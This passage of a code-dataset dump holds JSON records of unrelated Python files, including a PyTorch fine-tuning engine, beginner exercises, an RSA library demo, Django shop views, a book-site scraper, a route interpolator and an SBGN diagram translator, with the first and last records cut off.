log_writer.writer.add_scalar(proxy_single_client +'/loss/'+ k, v.global_avg, log_writer.step) \n \n # log_writer.update(loss=loss_value, head=proxy_single_client + \"/loss\")\n # log_writer.update(class_acc=class_acc, head=proxy_single_client + \"/loss\")\n # log_writer.update(loss_scale=loss_scale_value, head=proxy_single_client + \"/opt\")\n # log_writer.update(lr=max_lr, head=proxy_single_client + \"/opt\")\n # log_writer.update(min_lr=min_lr, head=proxy_single_client + \"/opt\")\n # log_writer.update(weight_decay=weight_decay_value, head=proxy_single_client + \"/opt\")\n # log_writer.update(grad_norm=grad_norm, head=proxy_single_client + \"/opt\")\n \n log_writer.set_step()\n \n args.current_acc[cur_single_client] = metric_logger.get_class_acc()\n \n print('best_acc:', args.best_acc[cur_single_client])\n print('current_acc:', 
args.current_acc[cur_single_client])\n if args.best_acc[cur_single_client] < args.current_acc[cur_single_client]:\n args.best_acc[cur_single_client] = args.current_acc[cur_single_client]\n \n return {k: meter.global_avg for k, meter in metric_logger.meters.items()}\n\n\n@torch.no_grad()\ndef evaluate(data_loader, model, device):\n criterion = torch.nn.CrossEntropyLoss()\n \n metric_logger = misc.MetricLogger(delimiter=\" \")\n header = 'Test:'\n\n # switch to evaluation mode\n model.eval()\n\n for batch in metric_logger.log_every(data_loader, 10, header):\n images = batch[0]\n target = batch[-1]\n images = images.to(device, non_blocking=True)\n target = target.to(device, non_blocking=True)\n\n # compute output\n with torch.cuda.amp.autocast():\n output = model(images)\n loss = criterion(output, target)\n\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n\n batch_size = images.shape[0]\n metric_logger.update(loss=loss.item())\n metric_logger.meters['acc1'].update(acc1.item(), n=batch_size)\n metric_logger.meters['acc5'].update(acc5.item(), n=batch_size)\n \n # gather the stats from all processes\n print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}'\n .format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss))\n\n return {k: meter.global_avg for k, meter in metric_logger.meters.items()}\n","repo_name":"rui-yan/SSL-FL","sub_path":"code/fed_beit/engine_for_finetuning.py","file_name":"engine_for_finetuning.py","file_ext":"py","file_size_in_byte":8926,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"67"}
+{"seq_id":"37181617398","text":"'''\nPython Exercise 062: Improve CHALLENGE 061 by asking the user whether they want to show a few more terms.\nThe program will end when the user says they want to show 0 terms.\n'''\n'''my code\nprint(' '*5 + 'Arithmetic Progression Generator')\nprint('-='*10)\ntermo = int(input('First Term: '))\nrazao = int(input('Common Difference: '))\ncont = 1\nvar_termor = 10\nwhile cont <= var_termor:\n\tif cont == 1:\n\t\tprint(termo, end=' -> ')\n\telse:\n\t\ttermo += razao\n\t\tprint(termo, end=' -> ')\n\tif cont == var_termor:\n\t\tprint('Pause!')\n\t\tt = int(input('How many more terms do you want to show? '))\n\t\tif t == 0:\n\t\t\tbreak\n\t\telse:\n\t\t\tcont = 1\n\t\t\tvar_termor = t\n\tcont += 1\n'''\nprint('Arithmetic Progression Generator')\nprint('-=' * 10)\nprimeiro = int(input('First Term: '))\nrazao = int(input('Common Difference of the AP: '))\ntermo = primeiro\ncont = 1\ntotal = 0\nmais = 10\n\nwhile mais != 0:\n\ttotal += mais\n\twhile cont <= total:\n\t\tprint('{} -> '.format(termo), end='')\n\t\ttermo += razao\n\t\tcont += 1\n\tprint('Pause')\n\tmais = int(input('How many more terms do you want to show? '))\nprint('Progression finished with {} terms shown.'.format(total))\n\n\n","repo_name":"gglsilva/estudosPython","sub_path":"estrutural/Curso_em_Video/ex062.py","file_name":"ex062.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"13010216287","text":"# __author__ = 'Administrator'\n#\n# api_dict= {\n# 'k1':'v1',\n# 'k2':'v2',\n# 'k3':'v3',\n# }\n# for k in list(api_dict.keys()):\n# v = api_dict[k]\n# if v == 'v2':\n# del api_dict[k]\n# print(api_dict)\n# # for k,v in api_dict.keys():\n# # if v == 'v2':\n# # del api_dict[k]\n\nimport rsa\nimport base64\n\n\n# ######### 1. Generate the public/private key pair #########\npub_key_obj, priv_key_obj = rsa.newkeys(256)\n\npub_key_str = pub_key_obj.save_pkcs1()\npub_key_code = base64.standard_b64encode(pub_key_str)\n\npriv_key_str = priv_key_obj.save_pkcs1()\npriv_key_code = base64.standard_b64encode(priv_key_str)\n\nprint(pub_key_code,type(pub_key_code))\nprint(priv_key_code,type(priv_key_code))\n\n# ######### 2. Encrypt #########\ndef encrypt(value):\n key_str = base64.standard_b64decode(pub_key_code)\n pk = rsa.PublicKey.load_pkcs1(key_str)\n val = rsa.encrypt(value.encode('utf-8'), pk)\n return val\n\n\n# ######### 3. Decrypt #########\ndef decrypt(value):\n key_str = base64.standard_b64decode(priv_key_code)\n pk = rsa.PrivateKey.load_pkcs1(key_str)\n val = rsa.decrypt(value, pk)\n return val\n\n\n# ######### Basic usage #########\nif __name__ == '__main__':\n v = 'wupeiqi'\n v1 = encrypt(v)\n print(v1)\n v2 = decrypt(v1)\n print(v2)","repo_name":"Jiesanc/CMDB","sub_path":"autoserver/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"31209126210","text":"from django.core import paginator\nfrom django.shortcuts import render\nfrom .models import order, products\nfrom django.core.paginator import Paginator\n# Create your views here.\n\ndef index(request):\n\n product_objects = products.objects.all()\n template_name = 'shop/index.html'\n # Search functionality\n item_name = request.GET.get('item_name')\n if item_name != '' and item_name is not None: # For questions about querysets, see the page below\n product_objects = product_objects.filter(title__icontains = item_name) #https://sodocumentation.net/django/topic/1235/querysets\n\n # Paginator code & link\n #https://docs.djangoproject.com/en/3.2/topics/pagination/\n paginator = Paginator(product_objects,4)\n page_number = request.GET.get('page')\n product_objects = paginator.get_page(page_number)\n\n return render(request,template_name,{'product_objects': product_objects})\n\n\ndef detail(request,obj_id):\n product_objects = products.objects.get(id=obj_id)\n return render(request,'shop/detail.html',{'product_objects':product_objects})\n\ndef checkout(request):\n\n if request.method == 'POST':\n\n items = request.POST.get('items',\"\") # allow a null value; that's why the empty string \"\" is the default\n name = request.POST.get('name',\"\")\n email = request.POST.get('email',\"\")\n address = request.POST.get('address',\"\")\n city = request.POST.get('city',\"\")\n state = request.POST.get('state',\"\")\n zipcode = request.POST.get('zipcode',\"\")\n total = request.POST.get('total','')\n order_list = order( items = items,name = name, email = email, address = address, city = city, state = state, zipcode = zipcode,total = total)\n order_list.save()\n\n return render(request,'shop/checkout.html')\n","repo_name":"antony-praveen/Ecom","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"}
+{"seq_id":"30076536613","text":"\r\nclass Question4():\r\n\r\n def __init__(self, input_str):\r\n\r\n self.str_ = input_str\r\n\r\n def palindrome(self, string_):\r\n\r\n if(len(string_) != len(self.str_)):\r\n\r\n return False\r\n\r\n print('Palindrome check running..')\r\n\r\n count = 0\r\n string_rev = string_[::-1]\r\n\r\n print('Reversed string: ', string_rev)\r\n print('Original string: ', string_)\r\n \r\n if(len(self.str_) != len(string_rev)):\r\n\r\n print('This executed')\r\n
\r\n return False \r\n\r\n else:\r\n\r\n for i in range(len(self.str_)):\r\n\r\n if(self.str_[i] == string_rev[i]):\r\n\r\n count = count + 1\r\n\r\n if(count == len(string_rev)):\r\n\r\n return True\r\n\r\n def permutate(self, str_):\r\n\r\n l = []\r\n\r\n sub_str = ''\r\n\r\n if(len(str_) == 0):\r\n\r\n print('Empty string')\r\n\r\n # Iterate over every position so the last character can also lead a permutation.\r\n for i in range(len(str_)):\r\n\r\n temp = str_[i]\r\n\r\n sub_str = str_[:i]+str_[i+1:]\r\n\r\n result_permutate = self.permutate(sub_str)\r\n\r\n if(not len(result_permutate) < len(self.str_)-2):\r\n\r\n for i in result_permutate:\r\n \r\n l.append(temp+i)\r\n\r\n if(self.palindrome(l[-1])):\r\n\r\n print(\"Palindrome\")\r\n\r\n return l\r\n\r\n return sub_str\r\n\r\n\r\n def run(self):\r\n\r\n result = self.permutate(self.str_)\r\n\r\n return result\r\n\r\nprint('----------------')\r\n\r\nques = Question4('tenet')\r\n\r\nques.run()\r\n","repo_name":"PradeepKumar1994/data-structures-and-algorithms","sub_path":"array/question-4/queston-4.py","file_name":"queston-4.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"25749924539","text":"import os\nimport requests\n\nfrom bs4 import BeautifulSoup\nfrom argparse import ArgumentParser\nfrom urllib.error import URLError\nfrom pathlib import Path\nfrom dotenv import load_dotenv\nfrom urllib.parse import urljoin\nfrom parse_tululu import (\n check_for_redirect,\n download_image,\n download_txt,\n download_json,\n get_book_params,\n)\n\n\ndef get_args():\n parser = ArgumentParser(\"Select a range of pages to download books\")\n parser.add_argument(\n \"-s\", \"--start_page\", default=1, type=int, help=\"Start page range\"\n )\n parser.add_argument(\n \"-e\", \"--end_page\", default=1, type=int, help=\"End page range\"\n )\n parser.add_argument(\n \"-c\",\n \"--category_id\",\n default=55,\n type=int,\n help=\"ID of the book category\",\n )\n parser.add_argument(\n \"-d\",\n \"--dest_folder\",\n default=\".\",\n type=str,\n help=\"The path where the parsing result will be recorded\",\n )\n parser.add_argument(\n \"-i\",\n \"--skip_imgs\",\n default=False,\n type=bool,\n help=\"Allows you not to download images if it's True\",\n )\n parser.add_argument(\n \"-t\",\n \"--skip_txt\",\n default=False,\n type=bool,\n help=\"Allows you not to download books if it's True\",\n )\n\n return parser.parse_args()\n\n\ndef get_book_id(relative_book_url):\n book_id = \"\".join(filter(str.isdigit, relative_book_url))\n return int(book_id) if book_id else None\n\n\nif __name__ == \"__main__\":\n load_dotenv()\n args = get_args()\n path = args.dest_folder\n\n imgs_folder_path = os.path.join(path, \"images\")\n books_folder_path = os.path.join(path, \"books\")\n Path(imgs_folder_path).mkdir(parents=True, exist_ok=True)\n Path(books_folder_path).mkdir(parents=True, exist_ok=True)\n\n all_books_params = []\n for page in range(args.start_page, args.end_page + 1):\n url = f\"https://tululu.org/l{args.category_id}/{page}/\"\n try:\n response = requests.get(url)\n response.raise_for_status()\n\n soup = BeautifulSoup(response.text, \"lxml\")\n soup_book_urls = soup.find(\"div\", id=\"content\").find_all(\n \"table\", class_=\"d_book\"\n )\n\n for soup_book_url in soup_book_urls:\n relative_book_url = soup_book_url.find(\"a\")[\"href\"]\n book_url = urljoin(url, relative_book_url)\n response = requests.get(book_url)\n response.raise_for_status()\n\n check_for_redirect(response)\n book_id = get_book_id(relative_book_url)\n soup = 
BeautifulSoup(response.text, \"lxml\")\n (\n title,\n author,\n genres,\n comments,\n img_name,\n img_url,\n ) = get_book_params(soup, url)\n\n if not args.skip_imgs:\n img_src = download_image(\n img_url, img_name, imgs_folder_path\n )\n if not args.skip_txt:\n filename = f\"{book_id}.{title}\"\n book_path = download_txt(\n book_id, filename, books_folder_path\n )\n\n book_params = {\n \"title\": title,\n \"author\": author,\n \"genres\": genres,\n \"comments\": comments,\n \"img_src\": os.path.relpath(img_src),\n \"book_path\": os.path.relpath(book_path),\n }\n all_books_params.append(book_params)\n except URLError:\n print(f\"{url} - Book not found\")\n continue\n except Exception as ex:\n raise requests.exceptions.HTTPError(ex)\n download_json(all_books_params, path, \"books_info.json\")\n","repo_name":"trofimleg0/Library-parser","sub_path":"parse_tululu_category.py","file_name":"parse_tululu_category.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"23561875779","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 17 21:15:18 2018\n\n@author: tom_m\n\"\"\"\n\nimport csv\nimport numpy as np\n\n# USER INPUTS #################################################################\n\nrouteFilename = 'route.csv'\ninterpolatedRouteFilename = 'routeInterpolated.csv'\n\ndistanceStep = 10 # km\n\n###############################################################################\n\n# Import the full route data\nfile = open(routeFilename, 'r')\nrouteFile = csv.reader(file)\nheaders = []\ndata = {}\nnRow = 1\nfor row in routeFile:\n for index in range(0, len(row)) :\n value = row[index]\n # Compare values with ==, not identity (`is`), which is unreliable for ints.\n if nRow == 1 :\n data[value] = []\n headers.append(value)\n else :\n data[headers[index]].append(float(value))\n nRow += 1\n\n# Find the interpolated locations\ninterpolated = {}\ninterpolated['distance'] = np.append(np.arange(0, data['distance'][-1], distanceStep), data['distance'][-1]).tolist()\n\nindex1 = 0\nindex2Start = 1\nwhile index1 < len(interpolated['distance']) :\n distance = interpolated['distance'][index1]\n print('distance = {}'.format(distance))\n \n for index2 in range(index2Start, len(data['distance'])) :\n if data['distance'][index2] >= distance :\n \n # Interpolate between the distances\n fraction = (distance - data['distance'][index2-1]) / (data['distance'][index2] - data['distance'][index2-1])\n for header in headers :\n if header == 'distance' :\n continue;\n if header not in interpolated :\n interpolated[header] = []\n interpolated[header].extend([data[header][index2-1] + fraction*(data[header][index2] - data[header][index2-1])])\n \n index1 += 1\n index2Start = index2\n break;\nfile.close()\n\n# Write output to csv\nfile = open(interpolatedRouteFilename, 'w+', newline='')\nwriter = csv.writer(file)\nwriter.writerow(headers)\nfor index in range(0, len(interpolated['distance'])) :\n rowData = []\n for header in headers :\n rowData.append(interpolated[header][index])\n writer.writerow(rowData)\n print('Written {}/{}'.format(index+1, len(interpolated['distance'])))\nfile.close()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zl326/RacePlanner","sub_path":"ancillary/python/discretiseRoute.py","file_name":"discretiseRoute.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"72581168532","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n#from __future__ import print_function\n#from __future__ import unicode_literals\nimport argparse\nimport codecs\nfrom graphviz import Digraph\nimport re\nimport sys\n\nimport libsbgnpy.libsbgn as libsbgn # import the bindings\nfrom libsbgnpy.libsbgnTypes import Language, GlyphClass, ArcClass\nfrom tradParams import *\n\nclass TraductionAF:\n \"\"\"\n This class translates an SBGNLog-AF graph stored in a text file\n into the SBGN-AF language with the libsbgnpy library.\n The graphviz library (DOT language) is used to obtain the\n absolute positions of the arcs and nodes.\n -------------------------------------------------------------------\n @author: Elea Greugny\n @date: 21/07/16\n \"\"\"\n def __init__(self, fichier_entree, fichier_sortie):\n self.data = codecs.open(fichier_entree, 'r', 'utf8')\n self.sbgn = libsbgn.sbgn()\n self.map = libsbgn.map()\n self.map.set_language(Language.AF)\n self.sbgn.set_map(self.map)\n self.f_out = fichier_sortie\n #image resolution: pixels / inch\n self.resolution = ParamsLogToAF.RESOLUTION\n\n #glyph counter\n self.nb_glyph = 0\n #arc counter\n self.nb_arc = 0\n\n #dictionary mapping the logical constants associated with\n #the glyphs (key) to the glyphs themselves.\n self.dic_const_glyph = {}\n\n #dictionary linking the glyphs (keys) to the arcs they take\n #part in as source or target, stored as a list\n #of tuples: ('s' or 't', arc).\n self.dic_glyph_arc = {}\n\n #dictionary giving access to the glyphs from their\n #id (key)\n self.dic_id_glyph = {}\n\n #dictionary giving access to the glyphs contained in\n #a compartment (key)\n self.dic_comp = {}\n\n #list of the glyphs that belong to no compartment,\n #initialized once all the glyphs are created\n self.single_glyph = []\n\n #dictionary of functions:\n #maps a predicate to the corresponding function.\n self.dic_func = {'compartment' : self.create_glyph,\n 'ba' : self.create_glyph, 'perturbation' : self.create_glyph,\n 'phenotype' : self.create_glyph, 'and' : self.create_glyph,\n 'or' : self.create_glyph, 'not' : self.create_glyph,\n 'delay' : self.create_glyph, 'label' : self.create_label,\n 'input' : self.create_arc, 'stimulates' : self.create_arc,\n 'inhibits' : self.create_arc,\n 'unknownInfluences' : self.create_arc,\n 'necessarilyStimulates' : self.create_arc,\n 'localized' : self.create_localisation,\n 'uoi' : self.create_unitOfInformation,\n 'biologicalActivity' : self.create_glyph}\n\n #graph in the DOT language\n self.dot_graph = Digraph('G', filename='position_graph_sbgn.gv',\n format='plain', encoding='utf8')\n\n #height and width of the graph in pixels: updated when\n #the .gv.plain file is read\n self.max_height = 0\n self.max_width = 0\n\n def create_glyph(self, const, cls):\n \"\"\"Creates a glyph object of type cls.\n The id will be 'glyphN' where N is the number of the glyph,\n incremented every time a glyph is created.\"\"\"\n self.nb_glyph += 1\n box = libsbgn.bbox()\n gly = libsbgn.glyph(class_=cls, id='glyph' +\n str(self.nb_glyph), bbox=box)\n self.map.add_glyph(gly)\n if const in self.dic_const_glyph.keys():\n text = \"\"\"The same logical constant '\"\"\" + const + \"\"\"' may be\n associated with several glyphs or the glyph '\"\"\" + const + \"\"\"'\n may be declared several times.\"\"\"\n raise DuplicateError(text)\n else:\n self.dic_const_glyph[const] = gly\n self.dic_glyph_arc[gly] = []\n self.dic_id_glyph[gly.get_id()] = gly\n if cls == GlyphClass.COMPARTMENT:\n self.dic_comp[gly] = []\n\n def create_arc(self, const_s, const_t, cls_arc):\n \"\"\"Creates an arc object of type cls_arc.\n const_s and const_t are the logical constants associated with\n the source and target glyphs respectively. These glyphs must\n already be present in self.dic_const_glyph.\n The id will be arcN where N is the number of the arc,\n incremented every time an arc is created.\"\"\"\n self.nb_arc += 1\n try:\n sour = self.port_management(self.dic_const_glyph[const_s])\n except KeyError:\n msg = \"\"\"The source glyph '\"\"\" + const_s + \"\"\"' used in this\n arc has not been declared.\"\"\"\n raise MissingGlyphError(msg)\n try:\n targ = self.port_management(self.dic_const_glyph[const_t])\n except KeyError:\n msg = \"\"\"The target glyph '\"\"\" + const_t + \"\"\"' used in this\n arc has not been declared.\"\"\"\n raise MissingGlyphError(msg)\n arc = libsbgn.arc(class_=cls_arc, source=sour, target=targ,\n id='arc' + str(self.nb_arc))\n self.map.add_arc(arc)\n self.dic_glyph_arc[self.dic_const_glyph[const_s]].append(('s', arc))\n self.dic_glyph_arc[self.dic_const_glyph[const_t]].append(('t', arc))\n\n def port_management(self, gly):\n \"\"\"This method manages the ports of a glyph when an arc is\n added. If the glyph already takes part in several arcs (in other\n words, it already has ports), a new port is created.\n If the glyph is linked to only one arc (it has no port),\n two ports are created: a first one to which the already present\n arc is bound, and another one for the new arc. If the glyph is\n linked to no arc, the new arc binds directly to the glyph and no\n port is needed. In every case, the method returns the id of\n the object to which the new arc will attach.\"\"\"\n if len(self.dic_glyph_arc[gly]) == 0:\n return gly.get_id()\n else:\n port_id = (gly.get_id() + '.' +\n str(len(self.dic_glyph_arc[gly])+1))\n port = libsbgn.port(id=port_id)\n gly.add_port(port)\n if len(self.dic_glyph_arc[gly]) == 1:\n port_id2 = (gly.get_id() + '.' +\n str(len(self.dic_glyph_arc[gly])))\n port2 = libsbgn.port(id=port_id2)\n gly.add_port(port2)\n first_arc_tuple = self.dic_glyph_arc[gly][0]\n if first_arc_tuple[0] == 's':\n first_arc_tuple[1].set_source(port2.get_id())\n else:\n first_arc_tuple[1].set_target(port2.get_id())\n return port.get_id()\n\n def create_label(self, const_g, lab):\n \"\"\"Creates a label object whose text attribute is the string\n lab passed as a parameter, and associates it with the glyph\n of logical constant const_g thanks to the id dictionary.\"\"\"\n lab = lab.encode('utf8')\n lab = lab.replace('\"', '')\n label = libsbgn.label(text=lab.decode('utf8'))\n try:\n self.dic_const_glyph[const_g].set_label(label)\n except KeyError:\n msg = \"\"\"The glyph '\"\"\" + const_g + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n\n def create_localisation(self, const_g, const_c):\n \"\"\"Assigns the glyph of logical constant const_g\n to the compartment of logical constant const_c\"\"\"\n try:\n gly = self.dic_const_glyph[const_g]\n except KeyError:\n msg = \"\"\"The glyph '\"\"\" + const_g + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n try:\n comp = self.dic_const_glyph[const_c]\n except KeyError:\n msg = \"\"\"The compartment '\"\"\" + const_c + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n gly.set_compartmentRef(comp.get_id())\n self.dic_comp[comp].append(gly)\n del self.single_glyph[self.single_glyph.index(gly)]\n\n def create_unitOfInformation(self, const_g, cls_ui, label_ui):\n \"\"\"Attaches a unit-of-information glyph to the glyph of logical\n constant const_g. The class of the unit of information is given\n by cls_ui. Its label, which may be empty, is given as a\n parameter. This method therefore creates two objects: the label\n of the unit of information and the unit-of-information glyph.\n The id of the unit of information is built from the id of the\n glyph it belongs to, with a letter appended.\"\"\"\n box = libsbgn.bbox()\n try:\n uoi = libsbgn.glyph(class_=GlyphClass.UNIT_OF_INFORMATION,\n id=str(self.dic_const_glyph[const_g].get_id())+'a', bbox=box)\n except KeyError:\n msg = \"\"\"The glyph '\"\"\" + const_g + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n if self.dic_const_glyph[const_g].get_class() != GlyphClass.COMPARTMENT:\n lab = label_ui.encode('utf8')\n lab = label_ui.replace('\"', '')\n lab = libsbgn.label(text=lab)#.decode('utf8'))\n uoi.set_label(lab)\n\n ent = libsbgn.entityType(name=cls_ui)\n uoi.set_entity(ent)\n else:\n cls_ui = cls_ui.replace('\"', '')\n label_ui = label_ui.replace('\"', '')\n if cls_ui == 'void':\n lab = libsbgn.label(text=label_ui)\n else:\n lab = libsbgn.label(text=cls_ui + ':' + label_ui)\n uoi.set_label(lab)\n\n self.dic_const_glyph[const_g].add_glyph(uoi)\n\n def logic_nodes_localisation(self):\n \"\"\"Places the logical glyphs (or, and, not, delay) in the\n compartment of one of their inputs. If none of their inputs is\n associated with a compartment, the glyph stays without a\n compartment.\"\"\"\n for gly in self.single_glyph:\n if gly.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n for couple in self.dic_glyph_arc[gly]:\n if couple[0] == 't':\n id_source = couple[1].get_source()\n if '.' in id_source:\n id_source = id_source[:id_source.find('.')]\n source = self.dic_id_glyph[id_source]\n if source.get_compartmentRef():\n comp = self.dic_id_glyph[\n source.get_compartmentRef()]\n self.dic_comp[comp].append(gly)\n del self.single_glyph[\n self.single_glyph.index(gly)]\n break\n\n def LogAF_to_AF(self):\n \"\"\"Reads the input file in the SBGNLog-AF language\n and creates the corresponding objects in the libsbgnpy library.\"\"\"\n data = self.data.readlines()\n for line in data:\n #first pass to create all the glyphs\n line = re.split('[(,)]', line)\n predicate = line[0]\n if len(line) == 3:\n #predicates of the form: predicate(a)\n const = line[1]\n try:\n cls = ParamsLogToAF.DIC_GLYPH_TYPE[predicate]\n except KeyError:\n msg = \"\"\"'\"\"\" + predicate + \"\"\"' doesn't match\n any glyph type. The allowed types are : ba/biologicalActivity,\n perturbation, phenotype, and, or, not, delay,\n compartment.\"\"\"\n raise GlyphClassError(msg)\n params = [const, cls]\n func = self.dic_func[predicate]\n func(*params)\n self.single_glyph = list(self.map.get_glyph())\n\n for line in data:\n #second pass for the other predicates\n split_line = re.split('[(,)]', line)\n predicate = split_line[0]\n if predicate in ParamsLogToAF.DIC_ARC_TYPE.keys():\n const_s = split_line[1]\n const_t = split_line[2]\n cls_a = ParamsLogToAF.DIC_ARC_TYPE[predicate]\n params = [const_s, const_t, cls_a]\n func = self.dic_func[predicate]\n func(*params)\n else:\n if len(split_line) == 4:\n #predicates of the form: predicate(a,b)\n if predicate in self.dic_func.keys():\n const = split_line[1]\n arg = split_line[2]\n params = [const, arg]\n func = self.dic_func[predicate]\n func(*params)\n else:\n msg = \"\"\"This line doesn't seem\n to match any logical predicate.\\n\"\"\" + line\n raise PredicateError(msg)\n elif len(split_line) == 5:\n #predicates of the form: predicate(a,b,c)\n #(assignment of the auxiliary units)\n if predicate in self.dic_func.keys():\n const_g = split_line[1]\n cls_ui = ParamsLogToAF.DIC_UI_TYPE[\n split_line[2].replace('\"', '')]\n label = split_line[3]\n params = [const_g, cls_ui, label]\n func = self.dic_func[predicate]\n func(*params)\n else:\n msg = \"\"\"This line doesn't seem\n to match any logical predicate.\\n\"\"\" + line\n raise PredicateError(msg)\n elif len(split_line) != 0 and (split_line[0] not in\n ParamsLogToAF.DIC_GLYPH_TYPE.keys()):\n msg = \"\"\"This line doesn't seem\n to match any logical predicate.\\n\"\"\" + line\n raise PredicateError(msg)\n\n self.logic_nodes_localisation()\n self.create_dot_graph()\n self.dot_graph.render('position_graph.gv', view=False)\n self.read_dot()\n\n def create_dot_graph(self):\n \"\"\"This method builds the SBGN graph in the DOT language.\n We do not try to reproduce the specific layout of SBGN graphs\n since we are only interested in the absolute positions of the\n nodes and arcs.\"\"\"\n #creation of the nodes included in compartments (clusters)\n comp_index = 0\n for comp in self.dic_comp.keys():\n cluster_name = 'cluster_' + str(comp_index)\n c = Digraph(cluster_name, encoding='utf8')\n for glyph in self.dic_comp[comp]:\n if glyph.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n c.node(glyph.get_id(),\n label=ParamsLogToAF.DIC_LOG_OP[glyph.get_class()],\n shape='circle')\n else:\n if glyph.get_label():\n c.node(glyph.get_id(),\n label=glyph.get_label().get_text().decode('utf8'))\n else:\n c.node(glyph.get_id())\n self.dot_graph.subgraph(c)\n comp_index += 1\n #creation of the nodes outside any compartment\n for glyph in self.single_glyph:\n if glyph.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n self.dot_graph.node(glyph.get_id(),\n label=ParamsLogToAF.DIC_LOG_OP[glyph.get_class()],\n shape='circle')\n else:\n if glyph.get_label():\n self.dot_graph.node(glyph.get_id(),\n label=glyph.get_label().get_text())\n else:\n self.dot_graph.node(glyph.get_id())\n #creation of the arcs\n for arc in self.map.get_arc():\n if '.' in arc.get_source():\n source = arc.get_source()[:arc.get_source().find('.')]\n else:\n source = arc.get_source()\n if '.' in arc.get_target():\n target = arc.get_target()[:arc.get_target().find('.')]\n else:\n target = arc.get_target()\n self.dot_graph.edge(source, target, tailclip='true')\n\n def coord_dot_to_sbgn(self, xdot, ydot):\n \"\"\"In the DOT language coordinates are given in inches whereas\n in SBGN they are given in pixels.\n The origin of a DOT graph is in the bottom-left corner whereas\n the origin of an SBGN graph is in the top-left corner.\n This method therefore converts DOT coordinates into SBGN\n coordinates. It returns a tuple (xsbgn, ysbgn).\"\"\"\n xsbgn = xdot * self.resolution + 0.025 * self.max_width\n ysbgn = 1.025 * self.max_height - ydot * self.resolution\n return (xsbgn, ysbgn)\n\n def change_origin_glyph(self, xdot, ydot, wdot, hdot):\n \"\"\"In the DOT language coordinates are given in inches whereas\n in SBGN they are given in pixels.\n The origin of a DOT graph is in the bottom-left corner whereas\n the origin of an SBGN graph is in the top-left corner.\n Moreover, in the DOT language a glyph is characterized by the\n center of its rectangle, whereas the SBGN language characterizes\n it by its top-left corner. This method therefore computes the\n coordinates of the top-left corner of a glyph from those of the\n center of its rectangle expressed in inches.\n This method returns a tuple (xsbgn, ysbgn, wsbgn, hsbgn)\"\"\"\n wsbgn = wdot * self.resolution\n hsbgn = hdot * self.resolution\n xsbgn = xdot * self.resolution - (wsbgn/2.0) + self.max_width * 0.025\n ysbgn = 1.025 * self.max_height - ydot * self.resolution - (hsbgn/2.0)\n return (xsbgn, ysbgn, wsbgn, hsbgn)\n\n def change_origin_logop(self, xdot, ydot):\n \"\"\"In the DOT language coordinates are given in inches whereas\n in SBGN they are given in pixels.\n The origin of a DOT graph is in the bottom-left corner whereas\n the origin of an SBGN graph is in the top-left corner.\n Moreover, in the DOT language a glyph is characterized by the\n center of its rectangle, whereas the SBGN language characterizes\n it by its top-left corner.\n This method therefore computes the coordinates of the top-left\n corner of a logical-operator glyph of dimension\n ParamsLogToAF.LOG_OP_DIM, from those of the center of its\n rectangle expressed in inches.\n This method returns a tuple (xsbgn, ysbgn)\"\"\"\n dsbgn = ParamsLogToAF.LOG_OP_DIM\n xsbgn = xdot * self.resolution - (dsbgn/2.0) + self.max_width * 0.025\n ysbgn = 1.025 * self.max_height - ydot * self.resolution - (dsbgn/2.0)\n return (xsbgn, ysbgn)\n\n def set_glyph_position(self, id_g, xdot, ydot, wdot, hdot):\n \"\"\"Computes the x and y coordinates of the glyph of id id_g\n from the xdot and ydot coordinates provided by DOT.\"\"\"\n gly = self.dic_id_glyph[id_g]\n if gly.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n (x_gly, y_gly) = self.change_origin_logop(xdot, ydot)\n w_gly = ParamsLogToAF.LOG_OP_DIM\n h_gly = ParamsLogToAF.LOG_OP_DIM\n else:\n (x_gly, y_gly, w_gly, h_gly) = self.change_origin_glyph(xdot,\n ydot, wdot, hdot)\n box = libsbgn.bbox(x=x_gly, y=y_gly, w=w_gly,\n h=h_gly)\n gly.set_bbox(box)\n if gly.get_glyph():\n self.set_uoi_position(gly)\n\n def set_comp_position(self, id_comp):\n \"\"\"Computes the coordinates of the compartment of id id_comp\n as well as the height and width of its bbox from the bboxes\n of the glyphs it contains.\"\"\"\n comp = self.dic_id_glyph[id_comp]\n x_pot_min = [gly.get_bbox().get_x() for gly in self.dic_comp[comp]]\n y_pot_min = [gly.get_bbox().get_y() for gly in self.dic_comp[comp]]\n x_pot_max = [gly.get_bbox().get_x() + gly.get_bbox().get_w()\n for gly in self.dic_comp[comp]]\n y_pot_max = [gly.get_bbox().get_y() + gly.get_bbox().get_h()\n for gly in self.dic_comp[comp]]\n x_min = min(x_pot_min)\n x_max = max(x_pot_max)\n y_min = min(y_pot_min)\n y_max = max(y_pot_max)\n\n w_comp = (x_max - x_min) * 1.1\n h_comp = (y_max - y_min) * 1.1\n 